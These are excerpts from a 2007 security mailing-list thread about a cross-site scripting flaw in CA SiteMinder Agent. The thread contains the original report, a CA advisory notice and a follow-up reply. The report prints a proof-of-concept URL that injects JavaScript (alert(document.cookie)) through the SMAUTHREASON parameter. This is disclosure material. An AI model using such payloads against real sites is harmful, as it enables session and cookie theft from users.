Re: Re: SiteMinder Agent: Cross Site Scripting

2007-11-09 Thread overet
I don't know the details of the vulnerable version, but the smpwservices.fcc page was accessed directly in the tested version. Exploit code was triggered like this: [*] with the URL: https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X I can view this JavaScript code in

Re: SiteMinder Agent: Cross Site Scripting

2007-11-09 Thread Williams, James K
Subject: SiteMinder Agent: Cross Site Scripting From: Giuseppe Gottardi overet () securitydate ! it Date: 2007-11-07 3:10:00 Security Advisory for CA Products utilizing CA SiteMinder Web Agent Last Updated: November 8, 2007 CA is aware of a report describing a cross-site scripting

SiteMinder Agent: Cross Site Scripting

2007-11-07 Thread Giuseppe Gottardi
# Exploit in [XSS]: https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] # Cross Site Scripting (Code): https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 In this way we can inject the alert()